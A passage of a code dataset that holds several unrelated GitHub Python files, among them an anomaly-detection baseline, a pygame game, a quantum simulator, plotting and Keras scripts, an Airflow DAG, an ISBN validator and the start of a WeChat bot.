inputs.to(device), label_batch.to(device), idx.to(device)\n if self.hybrid:\n inputs = self.ae_net.encoder(inputs) # in hybrid approach, take code representation of AE as features\n X_batch = inputs.view(inputs.size(0), -1) # X_batch.shape = (batch_size, n_channels * height * width)\n X += (X_batch.cpu().data.numpy(),)\n idxs += idx.cpu().data.numpy().astype(np.int64).tolist()\n labels += label_batch.cpu().data.numpy().astype(np.int64).tolist()\n X = np.concatenate(X)\n\n # Testing\n logger.info('Starting testing...')\n start_time = time.time()\n scores = (-1.0) * self.model.decision_function(X)\n self.results['test_time'] = time.time() - start_time\n scores = scores.flatten()\n\n # Save triples of (idx, label, score) in a list\n idx_label_score += list(zip(idxs, labels, scores.tolist()))\n self.results['test_scores'] = idx_label_score\n\n # Compute AUC\n _, labels, scores = zip(*idx_label_score)\n labels = np.array(labels)\n scores = np.array(scores)\n self.results['test_auc'] = roc_auc_score(labels, scores)\n\n # Log results\n logger.info('Test AUC: {:.2f}%'.format(100. * self.results['test_auc']))\n logger.info('Test Time: {:.3f}s'.format(self.results['test_time']))\n logger.info('Finished testing.')\n\n def load_ae(self, dataset_name, model_path):\n \"\"\"Load pretrained autoencoder from model_path for feature extraction in a hybrid Isolation Forest model.\"\"\"\n\n model_dict = torch.load(model_path, map_location='cpu')\n ae_net_dict = model_dict['ae_net_dict']\n if dataset_name in ['mnist', 'fmnist', 'cifar10']:\n net_name = dataset_name + '_LeNet'\n else:\n net_name = dataset_name + '_mlp'\n\n if self.ae_net is None:\n self.ae_net = build_autoencoder(net_name)\n\n # update keys (since there was a change in network definition)\n ae_keys = list(self.ae_net.state_dict().keys())\n for i in range(len(ae_net_dict)):\n k, v = ae_net_dict.popitem(False)\n new_key = ae_keys[i]\n ae_net_dict[new_key] = v\n i += 1\n\n self.ae_net.load_state_dict(ae_net_dict)\n self.ae_net.eval()\n\n def save_model(self, export_path):\n \"\"\"Save Isolation Forest model to export_path.\"\"\"\n pass\n\n def load_model(self, import_path, device: str = 'cpu'):\n \"\"\"Load Isolation Forest model from import_path.\"\"\"\n pass\n\n def save_results(self, export_json):\n \"\"\"Save results dict to a JSON-file.\"\"\"\n with open(export_json, 'w') as fp:\n json.dump(self.results, fp)\n","repo_name":"Minqi824/ADBench","sub_path":"adbench/baseline/DeepSAD/src/baselines/isoforest.py","file_name":"isoforest.py","file_ext":"py","file_size_in_byte":5732,"program_lang":"python","lang":"en","doc_type":"code","stars":687,"dataset":"github-code","pt":"75"} +{"seq_id":"74035630642","text":"import pygame\nfrom pygame.locals import *\n\n# Initialize pygame\npygame.init()\n\n# Constants\nSCREEN_WIDTH = 2000\nSCREEN_HEIGHT = 1000\nFARMER_SIZE = 16\nFARMER_SPEED = 5\nFPS = 60\n\n# Colors\nBLACK = (0, 0, 0)\nWHITE = (255, 255, 255)\n\nclass Farmer:\n def __init__(self, x, y):\n self.x = x\n self.y = y\n self.sprite_sheet = pygame.image.load('pics/P1.png')\n \n # Assuming your sprite frames are 16x16 as before\n self.walk_frames = [\n self.get_image(0, 0, 32, 32),\n self.get_image(32, 0, 32, 32)\n ]\n \n self.current_frame = 0\n self.image = self.walk_frames[self.current_frame]\n self.walking = False\n\n def get_image(self, x, y, width, height):\n \"\"\"Extract a specific image from a sprite sheet.\"\"\"\n image = pygame.Surface([width, height])\n image.blit(self.sprite_sheet, (0, 0), (x, y, width, height))\n return image\n\n def move(self, keys_pressed):\n self.walking = False\n if keys_pressed[K_w] or keys_pressed[K_UP]:\n self.y -= FARMER_SPEED\n self.walking = True\n if keys_pressed[K_s] or keys_pressed[K_DOWN]:\n self.y += FARMER_SPEED\n self.walking = True\n if keys_pressed[K_a] or keys_pressed[K_LEFT]:\n self.x -= FARMER_SPEED\n self.walking = True\n if keys_pressed[K_d] or keys_pressed[K_RIGHT]:\n self.x += FARMER_SPEED\n self.walking = True\n\n if self.walking:\n self.current_frame = (self.current_frame + 1) % len(self.walk_frames)\n self.image = self.walk_frames[self.current_frame]\n\n # Keep the farmer within the screen\n self.x = max(0, min(SCREEN_WIDTH - FARMER_SIZE, self.x))\n self.y = max(0, min(SCREEN_HEIGHT - FARMER_SIZE, self.y))\n\n def draw(self, screen):\n screen.blit(self.image, (self.x, self.y))\n\n\ndef main():\n screen = pygame.display.set_mode((SCREEN_WIDTH, SCREEN_HEIGHT))\n pygame.display.set_caption(\"Farmer Defense\")\n clock = pygame.time.Clock()\n\n # Initialize farmer in the middle of the screen\n farmer = Farmer(SCREEN_WIDTH // 2, SCREEN_HEIGHT // 2)\n \n running = True\n while running:\n keys_pressed = pygame.key.get_pressed()\n\n for event in pygame.event.get():\n if event.type == QUIT:\n running = False\n\n farmer.move(keys_pressed)\n\n # Draw everything\n screen.fill(WHITE)\n farmer.draw(screen)\n\n pygame.display.flip()\n clock.tick(FPS)\n\n pygame.quit()\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"Xinsssss/weird_mini_game","sub_path":"the_game.py","file_name":"the_game.py","file_ext":"py","file_size_in_byte":2609,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"28059082516","text":"from QuantumComputerSimulator.mods.MatrixFrame import MatrixFrame\nfrom QuantumComputerSimulator.mods.DenseMatrix import DenseMatrix\n\n\nimport copy\nimport numpy as np\n\nclass LazyMatrix(MatrixFrame):\n\n def __init__(self, Type, *args):\n '''\n Implements the Lazy method for quantum computing simulation.\n\n Type Gate to be built.
\n *args Position of control and target qubits.\n '''\n if Type == 'I':\n self.matrix = [lambda x: x[0], lambda x: x[1]]\n if Type == 'H':\n self.matrix = [lambda x: (x[0] + x[1]) / np.sqrt(2), lambda x: (x[0] - x[1]) / np.sqrt(2)]\n if Type == 'P':\n self.matrix = [lambda x: x[0], lambda x: np.exp(1j * args[0]) * x[1]]\n\n if Type == 'X':\n self.matrix = [lambda x: x[1], lambda x: x[0]]\n if Type == 'Y':\n self.matrix = [lambda x: 1j * x[1], lambda x: -1j * x[0]]\n if Type == 'Z':\n self.matrix = [lambda x: x[0], lambda x: -1 * x[1]]\n\n if Type == 'TP' or Type == 'MM' or Type == \"General\":\n self.matrix = args[0]\n\n if Type == 'CNOT':\n self.matrix = self.cnot(args[0], args[1], args[2])\n if Type == 'CV':\n self.matrix = self.cv(args[0], args[1], args[2])\n if Type == 'CZ':\n self.matrix = self.cz(args[0], args[1], args[2])\n\n if Type == 'M0':\n self.matrix = [lambda x: x[0], lambda x: 0]\n if Type == 'M1':\n self.matrix = [lambda x: 0, lambda x: x[1]]\n\n if Type == 'zerocol':\n self.matrix = []\n if Type == 'onecol':\n self.matrix = []\n\n self.dim = len(self.matrix)\n\n @classmethod\n def quantum_register(cls, qnum):\n '''Initialises register.'''\n reg = []\n for i in range(0,qnum):\n reg.append([lambda x: x[i]])\n return LazyMatrix('General',reg)\n\n @classmethod\n def tensor_prod(cls, m2, m1):\n '''\n Tensor product.\n '''\n tp = []\n for i in range(0, m1.dim):\n for j in range(0, m2.dim):\n tp.append(lambda x, y=i, z=j: m1.matrix[y](\n [m2.matrix[z]([x[m2.dim * k + l] for l in range(0, m2.dim)]) for k in range(0, m1.dim)]))\n\n new_matrix = LazyMatrix('TP', tp)\n return new_matrix\n\n @classmethod\n def matrix_multiply(cls, m1, m2):\n mm = []\n for i in range(0, m1.dim):\n mm.append(\n lambda x, y=i: m1.matrix[y]([m2.matrix[k]([x[l] for l in range(0, m2.dim)]) for k in range(0, m1.dim)]))\n\n new_matrix = LazyMatrix('MM', mm)\n return new_matrix\n\n @classmethod\n def inner_product(cls, M):\n return DenseMatrix.inner_product(M)\n\n @classmethod\n def trace(cls, M):\n return DenseMatrix.trace(M)\n\n def cnot(self, d, c, t):\n '''CNot gate'''\n digits = copy.deepcopy(d)\n cn = []\n\n index = super().CNOT_logic(digits, c, t)\n\n for i in range(0, len(index)):\n cn.append(lambda x, y=i: x[index[y]])\n\n return cn\n\n def cv(self, d, c, t):\n '''CV gate'''\n digits = copy.deepcopy(d)\n cv = []\n\n index = super().CV_logic(digits, c, t)\n\n for i in range(0, len(digits)):\n if index[i] == 1:\n cv.append(lambda x, y=i: 1j * x[y])\n else:\n cv.append(lambda x, y=i: x[y])\n\n return cv\n\n def cz(self, d, c, t):\n '''CZ gate'''\n digits = copy.deepcopy(d)\n cz = []\n\n index = super().CZ_logic(digits,c,t)\n\n for i in range(0,len(digits)):\n if index[i] == 1:\n cz.append(lambda x,y=i: -1*x[y])\n else:\n cz.append(lambda x,y=i: x[y])\n\n return cz\n\n def output(self,inputs):\n '''\n Gives the output state once the register, given by `inputs`, is applied.\n '''\n new_in = []\n for i in range(0,len(inputs)):\n new_in.append(inputs[i])\n out = []\n for i in range(0,self.dim):\n out.append(self.matrix[i](new_in))\n\n #To Vector form:\n out = np.array(out)\n out.shape = (len(out),1)\n return out","repo_name":"emmaghl/QCP_7","sub_path":"QuantumComputerSimulator/mods/LazyMatrix.py","file_name":"LazyMatrix.py","file_ext":"py","file_size_in_byte":4235,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"33569044644","text":"# -*- coding: utf-8 -*-\n\"\"\"\n@author: Marta\n\"\"\"\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport matplotlib.gridspec as gridspec\n#import default figure format for the book\nplt.style.use(['seaborn-ticks','../pv-textbook.mplstyle'])\n\n#import default color scheme for the book\nimport yaml\nwith open('../colors.yaml') as file:\n colors = yaml.load(file, Loader=yaml.FullLoader)\n\nstatic=pd.read_csv('data/Timeseries_37.779_-122.420_NS_1kWp_crystSi_14_36deg_11deg_2015_2015.csv', \n skiprows=range(0,10), sep=',')\nstatic_max =max([float(x) for x in static['P'][0:8760]])\nstatic_s = sorted([float(x)/static_max for x in static['P'][0:8760]], reverse=True)\n\ntracking=pd.read_csv('data/Timeseries_37.779_-122.420_NS_1kWp_crystSi_14_i0deg_2015_2015.csv', \n skiprows=range(0,10), sep=',')\ntracking_max =max([float(x) for x in tracking['P'][0:8760]])\ntracking_s = sorted([float(x)/tracking_max for x in static['P'][0:8760]], reverse=True)\n\nplt.figure(figsize=(18, 8))\ngs1 = gridspec.GridSpec(1, 2)\ngs1.update(wspace=0.2, hspace=0.2)\ncolor_1=colors['color5']\n\nax0 = plt.subplot(gs1[0,0])\nax0.set_ylabel('Normalized DC PV generation', fontsize=22)\n\nax0.plot(static_s, color=colors['color4'], linewidth=3,\n linestyle='--', label='fixed structure')\nax0.plot(tracking_s, color=colors['color5'], linewidth=3,\n label='HSAT')\nax0.set_xlim(0,8760)\nax0.set_ylim(0,1.05)\nax0.set_xlabel('hours throughout the year', fontsize=22,)\n# ax0.fill_between(np.arange(0,1000),np.array(tracking_s[0:1000]), \n# 0.8*np.ones(1000), color=colors['color5'], alpha=0.3)\n\nax0.fill_between(np.arange(0,900),np.array(static_s[0:900]), \n 0.8*np.ones(900), color=colors['color4'], alpha=0.6)\n\n\nax0.annotate('curtailed energy', xy=(300, 0.85), xytext=(1000, 0.9), fontsize=22,\n arrowprops=dict(facecolor='black', arrowstyle='->'))\n\nax0.annotate('inverter AC capacity', xy=(1000, 0.8), xytext=(2000, 0.8), fontsize=22,\n arrowprops=dict(facecolor='black', arrowstyle='->'))\nax0.legend(fancybox=False, fontsize=22, loc='lower right', \n facecolor='white', ncol=1, frameon=True)\n\nax1 = plt.subplot(gs1[0,1])\nyears=np.arange(2010,2022)\nstatic = [ 1.19, 1.2, 1.21, 1.21, 1.24, 1.24, 1.23, 1.23, 1.24, 1.23, 1.22, 1.28 ]\n#1-axis horizontal tracking\ntracking = [1.19, 1.22, 1.23, 1.24, 1.27, 1.26, 1.27, 1.26, 1.25, 1.25, 1.23, 1.26]\n\n\nax1.set_ylabel('DC to AC ratio (global average)', fontsize=22)\nax1.plot(years, static, color=colors['color4'], linewidth=3,\n linestyle='--', label='fixed structure',\n marker='o', markerfacecolor='white',markersize=12)\nax1.plot(years, tracking, color=colors['color5'], linewidth=3,\n label='HSAT',\n marker='o', markerfacecolor='white',markersize=12)\n\nax1.set_xlim(2009,2022)\nax1.set_ylim(1.18,1.30)\nax1.set_xticks(years)\nax1.set_xticklabels(years, rotation=45)\nax1.yaxis.grid('--')\n\nax1.legend(fancybox=False, fontsize=22, loc='best', \n facecolor='white', ncol=1, frameon=True)\nplt.savefig('figures/DC_AC_ratio.jpg', dpi=300, bbox_inches='tight') ","repo_name":"martavp/pv-textbook","sub_path":"Figures/Chapter_13/DC_AC_ratio.py","file_name":"DC_AC_ratio.py","file_ext":"py","file_size_in_byte":3137,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"75"} +{"seq_id":"41373832080","text":"import numpy as np\n\nfrom skimage.transform import resize\n\nfrom keras.models import Model\nfrom keras.optimizers import Adam\nfrom keras.layers import BatchNormalization\nfrom keras.layers import Input, concatenate, Conv2D, MaxPooling2D, Conv2DTranspose\n\nfrom designs.components.loss_functions import dice_coef_loss\nfrom designs.components.loss_functions import dice_coef\n\n\n# CITATION\n# - U-Net: https://arxiv.org/pdf/1505.04597.pdf\n# Note: they use 20 input layers.\n\n\n# resize input matrix\nresize_image_height_to = 128\nresize_image_width_to = 128\n\n\n# MODEL\ndef build():\n print(\"NO MAX POOL\")\n print('using model: straight up convolution, ditched the maxpooling') \n\n # expected input shape\n inputs = Input((resize_image_height_to, resize_image_width_to, 1)) # 1 channel, x rows, y = x columns\n\n conv1 = Conv2D(64, (3, 3), activation='relu', padding='same')(inputs) # -> convolution to features: 32 window: 3\n conv2 = Conv2D(64, (3, 3), activation='relu', padding='same')(conv1) # -> convolution to features: 32 window: 9\n conv3 = Conv2D(128, (5, 5), activation='relu', padding='same')(conv2) # -> convolution to features: 64 window: 18\n conv4 = Conv2D(128, (5, 5), activation='relu', padding='same')(conv3) # -> convolution to features: 64 window: 18\n conv5 = Conv2D(128, (5, 5), activation='relu', padding='same')(conv4) # -> convolution to features: 128 window: 54 \n conv6 = Conv2D(264, (5,5), activation='relu', padding='same')(conv5) # -> convolution to features: 128 window: 162\n conv7 = Conv2D(264, (5,5), activation='relu', padding='same')(conv6) # -> convolution to features: 256 window: 486\n conv8 = Conv2D(128, (5,5), activation='relu', padding='same')(conv7) # -> convolution to features: 256 window: 1458\n conv9 = Conv2D(128, (5,5), activation='relu', padding='same')(conv8) # -> convolution to features: 256 window: 1458\n cake0 = concatenate([conv1,\n conv2,\n conv3,\n conv4,\n conv5,\n conv6,\n conv7,\n conv8,\n conv9], axis=-1)\n\n conv10 = Conv2D(1, (1, 1), activation='sigmoid')(cake0)\n\n model = Model(inputs=[inputs], outputs=[conv10])\n model.compile(optimizer=Adam(lr=1e-3), loss=dice_coef_loss, metrics=[dice_coef])\n\n return model\n\n\n\n","repo_name":"mabafaba/ShelterSegmentation","sub_path":"designs/nomaxpool.py","file_name":"nomaxpool.py","file_ext":"py","file_size_in_byte":2435,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"75"} +{"seq_id":"38652956344","text":"import datetime as dt\n\nfrom airflow import DAG\nfrom airflow.decorators import dag, task\nfrom airflow.operators.bash import BashOperator\n\n\nargs = {\n \"owner\": \"jrstats\",\n \"retries\": 5,\n \"retry_delay\": dt.timedelta(minutes=2)\n}\n\n\n\n\n@dag(\n dag_id=\"cron\",\n description=\"cron\",\n start_date=dt.datetime(2022,12,19), # catchup=True airflow will automatically run the flow once for each day missed\n schedule_interval=\"0 3 * * TUE,FRI\",\n default_args=args,\n catchup=True\n)\ndef taskflow_dag():\n \n b0 = BashOperator(\n task_id=\"bash0\",\n bash_command=\"echo hello world\"\n )\n\ntaskflow_dag()\n","repo_name":"jrstats/airflow-training","sub_path":"dags/5_cron.py","file_name":"5_cron.py","file_ext":"py","file_size_in_byte":625,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"17488041570","text":"import re\nimport subprocess as sp\n\ndef lmake(*args,rc=0,summary={},**kwds) :\n\n\tkwds.setdefault('start',...)\n\n\ttry :\n\n\t\tcmd = ('lmake',*args)\n\t\tprint()\n\t\tprint( '+ ' + ' '.join(cmd) )\n\t\tproc = sp.run( cmd , universal_newlines=True , stdin=None , stdout=sp.PIPE )\n\t\tprint(proc.stdout,end='',flush=True)\n\t\tif proc.returncode!=rc : raise RuntimeError(f'bad return code {proc.returncode} != {rc}')\n\t\tsp.run( ('ldump',) , universal_newlines=True , stdin=None , stdout=sp.PIPE , check=True )\n\n\t\tcnt = { k:0 for k in kwds }\n\t\tsum_cnt = { k:0 for k in summary }\n\t\tseen_summary = False\n\t\tfor l in proc.stdout.splitlines() :\n\t\t\tif l=='| SUMMARY |' : seen_summary = True\n\t\t\tif seen_summary :\n\t\t\t\tfor k in summary :\n\t\t\t\t\tm = re.fullmatch(k,l)\n\t\t\t\t\tif m : sum_cnt[k] += 1\n\t\t\telse :\n\t\t\t\tm = re.fullmatch(r'(?P\\w+) .*',l)\n\t\t\t\tif m :\n\t\t\t\t\tk = m.group('key')\n\t\t\t\t\tif k not in cnt : raise RuntimeError(f'unexpected key {k}')\n\t\t\t\t\tcnt[k] += 1\n\t\tfor k,v in list(kwds.items()) :\n\t\t\tif v==... :\n\t\t\t\tdel cnt [k]\n\t\t\t\tdel kwds[k]\n\t\tif cnt!=kwds :\n\t\t\tfor k in cnt :\n\t\t\t\tif cnt[k]!=kwds[k] : raise RuntimeError(f'bad count for {k} : {cnt[k]} != {kwds[k]}')\n\t\tif sum_cnt!=summary :\n\t\t\tfor k in sum_cnt :\n\t\t\t\tif sum_cnt[k]!=summary[k] : raise RuntimeError(f'bad count for summary {k} : {sum_cnt[k]} != {summary[k]}')\n\n\texcept RuntimeError as e :\n\t\tprint('*** '+e.args[0])\n\t\traise\n","repo_name":"cesar-douady/open-lmake","sub_path":"_lib/ut.py","file_name":"ut.py","file_ext":"py","file_size_in_byte":1387,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"75"} +{"seq_id":"40863689804","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Fri Feb 11 16:40:58 2022\r\n\r\n@author: R.U.S.T.E.A.M\r\n\"\"\"\r\n\r\ndef add_binary(a,b):\r\n a = a + b\r\n b = ''\r\n while a > 0:\r\n b += str(a%2)\r\n a //=2\r\n if b[::-1]:\r\n return b[::-1]\r\n else:\r\n return '0'","repo_name":"rustamabdukakhorov/CodeWars_Solutions","sub_path":"7_kyu_Binary Addition.py","file_name":"7_kyu_Binary Addition.py","file_ext":"py","file_size_in_byte":276,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"75"} +{"seq_id":"69853453683","text":"# -*- coding: utf-8 -*-\n\"\"\"\nAssorted utility functions.\n\"\"\"\n# Written by Johannes Langøy, 2014. Public domain.\n\ndef flatten(lst):\n out = []\n for i in lst:\n if isinstance(i, list):\n out.extend(flatten(i))\n else:\n out.append(i)\n return out\n\ndef exert(elms, lst, pos):\n for i in elms:\n lst.insert(pos, i)\n pos += 1\n","repo_name":"Jovlang/python","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":375,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"40920529350","text":"print('Campanha de Vacinação - PuppyBel!')\n\npets_vacinados = 0\ncontinuar = 's'\n\nwhile continuar == 's':\n especie = input('Qual a espécie do seu pet? ').lower().strip()\n if especie in [\"cachorro\", \"cao\", \"canis\", \"gato\", \"felino\"]:\n nome = input(f'Qual o nome do seu {especie}? ').title().strip()\n pets_vacinados += 1\n print(f'Espécie: {especie}, Nome: {nome}, Número: {pets_vacinados}')\n\n for i in range(1, 4):\n print(f'Vacina <{i}> - OK.')\n\n print(f'{nome} foi vacinado(a) com sucesso!')\n else:\n print(f\"Desculpe, a campanha de vacinação não atende {especie}.\")\n\n opcao = input(\"Há mais animais na fila para vacinar? (s/n) \").lower().strip()\n if opcao == \"s\":\n continuar = opcao\n else:\n continuar = 'n'\n\nprint(f'A campanha foi finalizada.\\nTotal de animais vacinados: {pets_vacinados}')","repo_name":"Slimacar/Academicos","sub_path":"3_CODIGO_EuTuNos.py","file_name":"3_CODIGO_EuTuNos.py","file_ext":"py","file_size_in_byte":879,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"6607631946","text":"from matplotlib import pyplot as plt\r\nfrom collections.abc import Iterable\r\nfrom os import path\r\nfrom datetime import datetime\r\nfrom IPython.display import Image\r\n\r\nimport cv2 as cv\r\nimport numpy as np\r\nimport re\r\n\r\n\r\ndef show_image(image):\r\n \"\"\"\r\n Stores first a version in the hard drive with a name generated from the current\r\n timestamp, then display it using jupyter builtin function Image\r\n \"\"\"\r\n current_timestamp = datetime.now()\r\n extension = '.jpg' # auto handled by opencv.\r\n filename = re.sub(r'\\D', '_', str(current_timestamp)) + extension\r\n temporary_directory = 'temporary_pics'\r\n file_path = path.join('.', temporary_directory, filename)\r\n cv.imwrite(file_path, image)\r\n return Image(file_path)\r\n\r\n\r\ndef load_image(filename):\r\n pics_directory = 'pics'\r\n # for portable code between different platforms.\r\n file_path = path.join(pics_directory, filename)\r\n return cv.imread(file_path, 0)\r\n\r\n\r\ndef show_image_with_histogram(images, show_cdf=False):\r\n \"\"\"\"\r\n Display images by side their histogram\r\n\r\n Parameters\r\n ----------\r\n image : array of images or a single image\r\n embed_cdf: whether to include cumulative distributive \r\n function in the histogram plot default false\r\n \"\"\"\r\n\r\n if not isinstance(images, Iterable):\r\n images = [images, ]\r\n\r\n image_count, subplot_index = len(images), 1\r\n\r\n plt.figure(\r\n num=None, \r\n figsize=(16, 3*image_count), \r\n dpi=100, \r\n facecolor='w', \r\n edgecolor='k'\r\n )\r\n\r\n for image in images:\r\n histogram, _ = np.histogram(image.flatten(),256,[0,256])\r\n # histogram = cv.calcHist([image],[0],None,[256],[0,256])\r\n plt.subplot(image_count, 2, subplot_index)\r\n plt.imshow(image, 'gray')\r\n\r\n plt.subplot(image_count, 2, subplot_index + 1)\r\n plt.hist(image.flatten(),256,[0,256], color = 'r')\r\n\r\n if show_cdf:\r\n cdf = histogram.cumsum()\r\n cdf_normalized = cdf * histogram.max()/ cdf.max()\r\n plt.plot(cdf_normalized, color = 'b')\r\n plt.legend(('cdf','histogram'), loc = 'upper left')\r\n\r\n subplot_index += 2\r\n\r\n plt.xlim([0,256])\r\n plt.show()\r\n","repo_name":"rachid-el-kedmiri/digital_image_processing","sub_path":"helpers.py","file_name":"helpers.py","file_ext":"py","file_size_in_byte":2253,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"20735202438","text":"__author__ = 'torresal'\n\n\"\"\"Notes for Programmer\"\"\"\n\"\"\"Helpful links:\n http://dbpedia.org/sparql\n http://dbpedia.org/sparql?default-graph-uri=http%3A%2F%2Fdbpedia.org&query=select+distinct+%3Fbook+%3Fisbn%0D%0A++++where+%7B%0D%0A++++++%3Fbook+a+dbo%3ABook+.%0D%0A++++++%3Fbook+%3Fprop+%3Fobj+.%0D%0A++++++%3Fbook+dbp%3Aisbn+%3Fisbn+.%0D%0A++++%7D%0D%0A++++LIMIT+1000&format=text%2Fhtml&timeout=30000&debug=on\n https://pypi.python.org/pypi/Distance\"\"\"\n\nimport re,argparse, time\nfrom isbn_hyphenate import hyphenate\nfrom isbnlib import EAN13, clean, to_isbn13, meta, canonical, to_isbn10\nfrom SPARQLWrapper import SPARQLWrapper, JSON\n\ndef RQUERY(r):\n #SPARQL query ISBNs from dbpedia\n sparql = SPARQLWrapper(\"http://dbpedia.org/sparql\")\n sparql.setQuery(r)\n sparql.setReturnFormat(JSON)\n results = sparql.query().convert()\n print(r)\n #print(results)\n if len(results[\"results\"][\"bindings\"]) != 0:\n print(results)\n pass\n return results[\"results\"][\"bindings\"]\n\nQUERY = \"\"\"\n select distinct ?book ?prop ?obj\n where {\n ?book a dbo:Book .\n ?book ?prop ?obj .\n ?book dbp:isbn ?isbn .\n FILTER (regex(?isbn, \"%s\" ))\n }\n LIMIT 100\n \"\"\"\n\n#ERROR file\nfile = open(\"DBPEDIA-ERRORS.txt\", \"w\")\nDATE = (\"DATE:\" + time.strftime(\"%m/%d/%Y\"))\nTIME = (\"MILITARY TIME:\" + time.strftime(\"%H:%M:%S\"))\nfile.write(DATE+\"\\n\"+TIME+\"\\n\")\n\n\ndef parse(url):\n import requests\n r = requests.get(url, verify = False)\n JSONdict = r.json()\n return JSONdict\n\ndef main():\n#Commnd line arguments\n parser = argparse.ArgumentParser()\n parser.add_argument('-path', '--GCIS', help = \"Insert url path to GCIS book in JSON format [ex.'https://gcis-search-stage.jpl.net:3000/book.json?all=1'] \")\n args = parser.parse_args()\n GCIS = args.GCIS\n\n if GCIS is None:\n GCIS = 'https://gcis-search-stage.jpl.net:3000/book.json?all=1'\n print('NO MANUAL GCIS PATH\\n ALL GCIS BOOK JSON FORMATS WILL BE USED AS DEFAULT')\n\n GCISPAR = parse(GCIS)\n for x in range(len(GCISPAR)):\n try:\n #Extracts book identifier from GCIS#\n IDEN = GCISPAR[x][\"identifier\"]\n match = re.search(r'.*/(.*?)\\..*?$', GCIS)\n if match:\n FILETYPE = match.groups()[0]\n #HREF = url that leads to book.json in GCIS-DEV\n HREF = 'https://gcis-search-stage.jpl.net:3000/{}/{}.json' .format(FILETYPE,IDEN)\n HREFPAR = parse(HREF)\n #Extracts book title and isbn from GCIS-DEV\n d = dict(HREFPAR)\n TITLE = d['title']\n ISBNS = d['isbn']\n #Cleans ISBNS to only conatian valid characters\n CISBN = clean(ISBNS)\n #V13 = validated canonical ISBN-13\n V13 = EAN13(CISBN)\n if V13 is None:\n V13 = canonical(CISBN)\n M = parse(HREF)\n\n print(\"GCIS-DEV\\n\\n\\t\", M, '\\n\\n\\t', \"isbn_original:\", ISBNS, '\\n\\n\\t', \"isbn_mod:\", V13, \"\\n\\n\")\n\n #DBpedia ISBN formats\n a = ISBNS\n b = canonical(CISBN)\n c = to_isbn10(CISBN)\n d = hyphenate(to_isbn10(CISBN))\n e = to_isbn13(CISBN)\n f = hyphenate(to_isbn13(CISBN))\n g = V13\n h = \"ISBN {}\" .format(CISBN)\n i = \"ISBN {}\" .format(canonical(CISBN))\n j = \"ISBN {}\" .format(hyphenate(to_isbn13(CISBN)))\n k = \"ISBN {}\" .format(V13)\n l = \"ISBN {}\" .format(to_isbn10(CISBN))\n m = \"ISBN {}\" .format(hyphenate(to_isbn10(CISBN)))\n\n tests = [a,b,c,d,e,f,g,h,i,j,k,l,m]\n\n for indie in tests:\n r = QUERY % indie\n RQUERY(r)\n if len(RQUERY(r)) != 0:\n print(RQUERY(r))\n break\n\n\n except:\n Error = '\\n\\t######## PROBLEM #######\\n\\tTitle:{}\\n\\tGCIS-ISBN:{}\\n\\tIdentifier:{}\\n\\n'.format(TITLE, ISBNS, IDEN)\n print(Error)\n file.write(Error)\n\nif __name__ =='__main__':\n main()\n\n\n\n","repo_name":"torresal/gcis-isbn-validation","sub_path":"dbpedia_isbn_validator.py","file_name":"dbpedia_isbn_validator.py","file_ext":"py","file_size_in_byte":4109,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"23083645220","text":"#!/usr/bin/env python\n#coding: utf-8\n\n#from __future__ import division\nimport os\nimport time\nimport datetime\nimport threading\nimport schedule\nimport configparser\nimport re\nimport sys\nimport hashlib\nimport random\nfrom wxpy import *\n#from xpinyin import Pinyin\n\n\nfrom init import analyze\n#from init import express\nfrom init.logger import logger\nfrom init import xiaoyu\nfrom init import xiaodou\nfrom init import jianbao\nfrom init import diyi\nfrom importlib import reload\nreload(sys)\n#sys.setdefaultencoding('utf8')\n\n\n\nclass GroupMessage():\n #从配置文件获取参数,初始化变量\n def __init__(self):\n self.log_flag = 0\n cf = configparser.ConfigParser()\n if os.path.exists('config/my.conf'):\n cf.read('config/my.conf')\n else:\n cf.read('config/wechat.conf')\n self.path = cf.get('wechat', 'path')\n group_names = cf.get('wechat', 'group_name')\n self.group_list=group_names.strip(',').split(',')\n self.friend_name = cf.get('wechat','friends')\n self.torla_name = cf.get('wechat','group')\n self.welcome_word = cf.get('wechat','welcome_word')\n self.newcomer = cf.get('wechat','newcomer')\n self.recev_mps = int(cf.get('wechat','recev_mps'))\n self.use_xiaoi = int(cf.get('wechat','xiaoi'))\n self.key = cf.get('wechat','key')\n self.secret = cf.get('wechat','secret')\n self.xiaodou_key = cf.get('wechat','xiaodou_key')\n self.friends_accept = cf.get('wechat','friends_accept')\n \n self.invite_group1 = cf.get('wechat','invite_group1')\n self.invite_group2 = cf.get('wechat','invite_group2')\n \n self.send_morning = u'@all 早上好'\n self.send_night = u'@all 晚安哦'\n group_note = cf.get('wechat', 'group_note')\n self.group_note_list=group_note.strip(',').split(',')\n group_jianbao = cf.get('wechat', 'group_jianbao')\n self.group_jianbao_list=group_jianbao.strip(',').split(',')\n group_newcomer = cf.get('wechat', 'group_newcomer')\n group_newcomer1 = cf.get('wechat', 'group_newcomer1')\n self.group_newcomer_list=group_newcomer.strip(',').split(',')\n self.group_newcomer_list1=group_newcomer1.strip(',').split(',')\n self.send_time = cf.get('wechat', 'send_time')\n self.send_talks = cf.get('wechat', 'send_talks')\n \n if not os.path.exists(self.path):\n os.mkdir(self.path)\n self.talk_path = os.path.join(self.path, 'talks')\n if not os.path.exists(self.talk_path):\n os.mkdir(self.talk_path)\n self.members_path = os.path.join(self.path, 'members')\n if not os.path.exists(self.members_path):\n os.mkdir(self.members_path)\n self.friends_path = os.path.join(self.path, 'friends')\n if not 